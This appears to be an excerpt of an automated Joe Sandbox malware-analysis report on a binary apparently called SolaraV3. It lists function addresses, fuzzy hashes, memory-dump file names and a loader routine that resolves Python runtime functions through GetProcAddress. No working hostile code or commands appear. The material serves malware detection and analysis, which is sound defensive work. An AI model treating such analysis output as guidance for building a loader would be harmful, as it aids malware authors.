Instruction ID: e49a7615ca984a4e1ea734da703438e4e45211ea7d4b908c87197e0be26fe56a
Opcode Fuzzy Hash: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
Instruction Fuzzy Hash: 92B09220E0BB0AC6EA082B216C8221C22A4BF58701F98813AC00D80330DE2C20F65700

Function 00007FF6DC7135A0 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
Instruction ID: 4b4302875fbc5abf84f810357ff93d295f2d2c145ee36d4c0791abbf34b96390
Opcode Fuzzy Hash: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
Instruction Fuzzy Hash: 9BD1B362A08A4A86EB68CF2D816027D27A0EF45B58F146237CE0D977D5DF3DE867C740

Function 00007FF6DC709800 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
Instruction ID: 5ca0243e088dd1111cdd841feed4e76abde11e288906ae0df24abf2de88b6e3c
Opcode Fuzzy Hash: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
Instruction Fuzzy Hash: E8C18E762181E08BD28AEB29E46947A73E1F78930DB95406BEF87477C5CB3CA415EB10

Function 00007FF6DC712C10 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
Instruction ID: 6a49e4f0022d3727dfcdd9bc248ed2b5783514d9d095c9065334a43f043e9932
Opcode Fuzzy Hash: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
Instruction Fuzzy Hash: 57B16D72A18B8985E7668F3DC06523C3BA4E749F48F246136CA8E87395CF39D466C744

Function 00007FF6DC71E570 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
Instruction ID: 56c4d5c67d191122394da7ec0aaa3c6fcaa1bf75513cca5a463df81a34e99ff6
Opcode Fuzzy Hash: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
Instruction Fuzzy Hash: 5C811572A0C78586EB74CF2DA46837E7A91FB45794F506236DA8D83B89DF3CE4518B00

Function 00007FF6DC726418 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c4c9f5a32dfdae123a950871ad542e5144b1bba19a2b1a1cf20ca827a7dd530f
Instruction ID: eb561473ae368565ed7108a6c77729d4b319610a3b1344f180231a2551d84ee1
Opcode Fuzzy Hash: c4c9f5a32dfdae123a950871ad542e5144b1bba19a2b1a1cf20ca827a7dd530f
Instruction Fuzzy Hash: 7D610A22F1C29A86FB748AB99470A7DA691BF40770F14423FD66DC36C5DE7DE8628700

Function 00007FF6DC711D54 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction ID: 6b86f6030a4c0fa670fe202022defee6381b1c0c2a729ccead7e916f2790b6f8
Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction Fuzzy Hash: 10517A36A2965587EB248B2DC05137C3764EB45B68F245132DE8D9B7D4CF3AE863C740

Function 00007FF6DC711944 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction ID: b66ef2ffa1508a02bc3c48a5e21929a67d02ee179f5ae133316c99766ee72a9e
Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction Fuzzy Hash: 26518637A1865987E7248B2DC06423C3BA0EB44B58F246132CA8D9B794DF3AE863C740

Function 00007FF6DC712164 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction ID: b8c5dba7a9beda0976020125864c6cd0e12894e43b08332bfa72f3713a08ef1d
Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction Fuzzy Hash: 7751C836A1865986E7268B2DC46027C37B1FB54B68F246132CE4C97794CF3AE863D740

Function 00007FF6DC711740 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction ID: 751f2c1250c73423b8a96ef667b9660bea9bb6e39b00e0547303153a61dac1ca
Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction Fuzzy Hash: 80518936A1865987E7248B2DC06027C37A1EB55F68F24A132CE4D9B795CF3AED63C740

Function 00007FF6DC711F60 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction ID: bf8483b16a9e3ea9285bb84b65a41f17716d5443e8eed123013a81e6ca214906
Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction Fuzzy Hash: 8C518136A1965986E7258F2DC06433C37A5EB44B58F246132CE4D9B7A5CF3AE863C740

Function 00007FF6DC711B50 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction ID: 460d32da0d72202bc8947a094ec1ba4f74e5cdf43b1add80a6ff5801219bcadf
Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction Fuzzy Hash: 67517076A2865987E7348F2DC06033C27A1EB45B58F246132DE4D9B7A4DF3AE963C740

Function 00007FF6DC715D30 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction ID: 522d1fe2cf9d4e48aa28fbe6423c38137956548796d3fd7baccdd0ff6811c535
Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction Fuzzy Hash: 8241AF62C2D74E05E9ED891C05296BC26809F22BA0D5833BADDDD9B3C7CD0DA5BBC200

Function 00007FF6DC719EA0 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
Instruction ID: fa3d032f7b30805cc50ba6b29d375472940dc56853718c6a60417d2a5bf8498f
Opcode Fuzzy Hash: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
Instruction Fuzzy Hash: 1B41F432B14A5986EF04CF2ADA2426DA3A5BB48FD0B19A033EE1DD7B54DE3CC0538700

Function 00007FF6DC7180E4 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
Instruction ID: 570b298ed4a54bbcdf984833dfccb9670d031f132ca8d639b673e3d032a6172a
Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
Instruction Fuzzy Hash: C431F632B08B4641E7649F29645017EBAD5AF84BE0F15523EEA8D93BD5DF3CD0238704

Function 00007FF6DC729570 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
Instruction ID: 5ce8e2659a08866ac0f258aa527b95f3553aa5dbaea72da42ea8d077d4d66c0a
Opcode Fuzzy Hash: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
Instruction Fuzzy Hash: 25F044727182998ADBA88F69A40262977D1F708380F40803AD58DC3A04DE3C90628F04

Function 00007FF6DC70D30C Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
Instruction ID: b2291005c026e0ffcc1c7b8ac215d75bfc08eb5359ccbd19790d8c05acd79649
Opcode Fuzzy Hash: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
Instruction Fuzzy Hash: C6A00231D0CE0ED4E6588B01E8A003DA370FB68300B80403BF00ED10B0EF3DA426E300

Function 00007FF6DC705830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC705840
GetLastError.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC705852
GetProcAddress.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC705889
GetLastError.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC70589B
GetProcAddress.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC7058B4
GetLastError.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC7058C6
GetProcAddress.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC7058DF
GetLastError.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC7058F1
GetProcAddress.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC70590D
GetLastError.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC70591F
GetProcAddress.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC70593B
GetLastError.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC70594D
GetProcAddress.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC705969
GetLastError.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC70597B
GetProcAddress.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC705997
GetLastError.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC7059A9
GetProcAddress.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC7059C5
GetLastError.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC7059D7

Strings

PyUnicode_FromString, xrefs: 00007FF6DC705F7B, 00007FF6DC705F9D
Failed to get address for %hs, xrefs: 00007FF6DC705861
Py_PreInitialize, xrefs: 00007FF6DC70595F, 00007FF6DC705981
PyErr_NormalizeException, xrefs: 00007FF6DC705AFD, 00007FF6DC705B1F
PyImport_AddModule, xrefs: 00007FF6DC705BE3, 00007FF6DC705C05
PyConfig_Clear, xrefs: 00007FF6DC70598D, 00007FF6DC7059AF
PyObject_CallFunction, xrefs: 00007FF6DC705CF7, 00007FF6DC705D19
PyMem_RawFree, xrefs: 00007FF6DC705C9B, 00007FF6DC705CBD
PyErr_Print, xrefs: 00007FF6DC705B59, 00007FF6DC705B7B
PyUnicode_Decode, xrefs: 00007FF6DC705EF1, 00007FF6DC705F13
PyObject_Str, xrefs: 00007FF6DC705DAF, 00007FF6DC705DD1
PyConfig_InitIsolatedConfig, xrefs: 00007FF6DC7059BB, 00007FF6DC7059DD
PyEval_EvalCode, xrefs: 00007FF6DC705BB5, 00007FF6DC705BD7
PyRun_SimpleStringFlags, xrefs: 00007FF6DC705E0B, 00007FF6DC705E2D
PyUnicode_AsUTF8, xrefs: 00007FF6DC705EC3, 00007FF6DC705EE5
PyObject_SetAttrString, xrefs: 00007FF6DC705D81, 00007FF6DC705DA3
PyModule_GetDict, xrefs: 00007FF6DC705CC9, 00007FF6DC705CEB
Py_DecodeLocale, xrefs: 00007FF6DC70587F, 00007FF6DC7058A1
PyObject_GetAttrString, xrefs: 00007FF6DC705D53, 00007FF6DC705D75
Py_Finalize, xrefs: 00007FF6DC7058D5, 00007FF6DC7058F7
PyUnicode_DecodeFSDefault, xrefs: 00007FF6DC705F1F, 00007FF6DC705F41
PyConfig_SetBytesString, xrefs: 00007FF6DC705A17, 00007FF6DC705A39
PyUnicode_FromFormat, xrefs: 00007FF6DC705F4D, 00007FF6DC705F6F
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF6DC705DDD, 00007FF6DC705DFF
PyErr_Fetch, xrefs: 00007FF6DC705ACF, 00007FF6DC705AF1
PyConfig_SetString, xrefs: 00007FF6DC705A45, 00007FF6DC705A67
Py_DecRef, xrefs: 00007FF6DC705836, 00007FF6DC705858
PyConfig_SetWideStringList, xrefs: 00007FF6DC705A73, 00007FF6DC705A95
PyImport_ImportModule, xrefs: 00007FF6DC705C3F, 00007FF6DC705C61
PySys_SetObject, xrefs: 00007FF6DC705E95, 00007FF6DC705EB7
Py_IsInitialized, xrefs: 00007FF6DC705931, 00007FF6DC705953
Py_InitializeFromConfig, xrefs: 00007FF6DC705903, 00007FF6DC705925
GetProcAddress, xrefs: 00007FF6DC705868
PyStatus_Exception, xrefs: 00007FF6DC705E39, 00007FF6DC705E5B
PyUnicode_Replace, xrefs: 00007FF6DC705FD7, 00007FF6DC705FF9
PyErr_Occurred, xrefs: 00007FF6DC705B2B, 00007FF6DC705B4D
PyConfig_Read, xrefs: 00007FF6DC7059E9, 00007FF6DC705A0B
PyMarshal_ReadObjectFromString, xrefs: 00007FF6DC705C6D, 00007FF6DC705C8F
PyUnicode_Join, xrefs: 00007FF6DC705FA9, 00007FF6DC705FCB
PyErr_Clear, xrefs: 00007FF6DC705AA1, 00007FF6DC705AC3
PySys_GetObject, xrefs: 00007FF6DC705E67, 00007FF6DC705E89
Py_ExitStatusException, xrefs: 00007FF6DC7058AA, 00007FF6DC7058CC
PyImport_ExecCodeModule, xrefs: 00007FF6DC705C11, 00007FF6DC705C33
PyErr_Restore, xrefs: 00007FF6DC705B87, 00007FF6DC705BA9
PyObject_CallFunctionObjArgs, xrefs: 00007FF6DC705D25, 00007FF6DC705D47

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: AddressErrorLastProc
